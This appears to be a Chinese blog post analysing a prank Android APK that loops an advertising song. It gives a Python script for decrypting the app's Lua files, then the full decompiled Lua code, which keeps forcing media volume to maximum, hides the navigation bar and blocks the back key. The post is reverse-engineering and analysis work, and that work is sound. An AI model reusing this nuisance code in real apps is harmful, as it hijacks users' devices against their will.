-
拿到apk ,第一步肯定先放到虚拟机里跑一下看下效果,emmm这似曾相识的页面,这熟悉的音量,唯一变化的就是音乐变成了O泡果奶的魔性洗脑广告,懂了,不就是 "送给最好的ta.apk" 吗?
-
使用Android killer或apk改之理分析一下,这里使用Android Killer:
-
通过对比送给最好的ta.apk发现:多了一个layout.lua文件 不过从名字上看这就是个布局文件,影响不大,再就是mp3文件名字从原来的0.mp3改为了mc.mp3,其他的都没变 甚至软件图标都没变.
-
剩下的就简单了,虽然lua文件是加密过的,但是盲猜加密方式也没变,因此白嫖pcat大佬的解密脚本:
from ctypes import * import sys def decrypt(filename): s = open(filename, 'rb').read() outfile = 'out.lua' if s[0] == chr(0x1b) and s[1] != chr(0x4c): rst = chr(0x1b) size = len(s) v10 = 0 for i in range(1, size): v10 += size v = (c_ulonglong(-2139062143 * v10).value >> 32) + v10 v1 = c_uint(v).value >> 7 v2 = c_int(v).value < 0 rst += chr(ord(s[i]) ^ (v10 + v1 + v2) & 0xff) with open(outfile, 'wb') as f: f.write(rst) else: pass def foo(): print len(sys.argv) if len(sys.argv) == 2: filename = sys.argv[1] else: filename = 'main.lua' decrypt(filename) if __name__ == '__main__': foo() -
将得到的文件使用unluac.jar进行还原,最终得到三个lua文件分别为:
init.lua:
local L0, L1 appname = "2301431462281871829.0" appver = "9.0" packagename = "com.ta.cnm" appcode = "9" appsdk = "15" theme = "Theme_DeviceDefault_Light_NoActionBar" L0 = {} L1 = "WRITE_EXTERNAL_STORAGE" L0[1] = L1 user_permission = L0main.lua:
local L0, L1, L2, L3 L0 = require L1 = "import" L0(L1) L0 = import L1 = "android.app.*" L0(L1) L0 = import L1 = "android.os.*" L0(L1) L0 = import L1 = "android.widget.*" L0(L1) L0 = import L1 = "android.view.*" L0(L1) L0 = import L1 = "android.view.View" L0(L1) L0 = import L1 = "android.content.Context" L0(L1) L0 = import L1 = "android.media.MediaPlayer" L0(L1) L0 = import L1 = "android.media.AudioManager" L0(L1) L0 = import L1 = "com.androlua.Ticker" L0(L1) L0 = activity L0 = L0.getSystemService L1 = Context L1 = L1.AUDIO_SERVICE L0 = L0(L1) L0 = L0.setStreamVolume L1 = AudioManager L1 = L1.STREAM_MUSIC L2 = 15 L3 = AudioManager L3 = L3.FLAG_SHOW_UI L0(L1, L2, L3) L0 = activity L0 = L0.getDecorView L0 = L0() L0 = L0.setSystemUiVisibility L1 = View L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION L2 = View L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE L1 = L1 | L2 L0(L1) L0 = MediaPlayer L0 = L0() m = L0 L0 = m L0 = L0.reset L0() L0 = m L0 = L0.setDataSource L1 = activity L1 = L1.getLuaDir L1 = L1() L2 = "/mc.mp3" L1 = L1 .. L2 L0(L1) L0 = m L0 = L0.prepare L0() L0 = m L0 = L0.start L0() L0 = m L0 = L0.setLooping L1 = true L0(L1) L0 = Ticker L0 = L0() ti = L0 L0 = ti L0.Period = 10 L0 = ti function L1() local L0, L1, L2, L3 L0 = activity L0 = L0.getSystemService L1 = Context L1 = L1.AUDIO_SERVICE L0 = L0(L1) L0 = L0.setStreamVolume L1 = AudioManager L1 = L1.STREAM_MUSIC L2 = 15 L3 = AudioManager L3 = L3.FLAG_SHOW_UI L0(L1, L2, L3) L0 = activity L0 = L0.getDecorView L0 = L0() L0 = L0.setSystemUiVisibility L1 = View L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION L2 = View L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE L1 = L1 | L2 L0(L1) end L0.onTick = L1 L0 = ti L0 = L0.start L0() function L0(A0, A1) local L2, L3, L4, L5 L2 = string L2 = L2.find L3 = tostring L4 = A1 L3 = L3(L4) L4 = "KEYCODE_BACK" L2 = L2(L3, L4) if L2 ~= nil then L2 = activity L2 = L2.getSystemService L3 = Context L3 = L3.AUDIO_SERVICE L2 = L2(L3) L2 = L2.setStreamVolume L3 = AudioManager L3 = L3.STREAM_MUSIC L4 = 15 L5 = AudioManager L5 = L5.FLAG_SHOW_UI L2(L3, L4, L5) end L2 = true return L2 end onKeyDown = L0layout.lua:
local L0, L1, L2, L3 L0 = {} L1 = LinearLayout L0.layout_width = "fill" L0.layout_height = "fill" L2 = {} L3 = Button L2.textColor = "#D50000" L2.text = "230131138228184141230131138229150156 230132143228184141230132143229164150" L2.layout_height = "match_parent" L2.layout_width = "match_parent" L2.background = "#88888888" L2[1] = L3 L0[1] = L1 L0[2] = L2 return L0 -
分析这三个文件:
init.lua: 定义了app的名字,版本(已经是9.0了吗),包名(有点暴躁啊这位老哥),sdk版本,使用的主题,需要的权限等数据
main.lua:具体逻辑都在这里面:读取mc.mp3 播放 并一直把音量调整到15(最大),监听禁用返回按钮.
layout.lua:设置页面布局
-
分析完毕.解决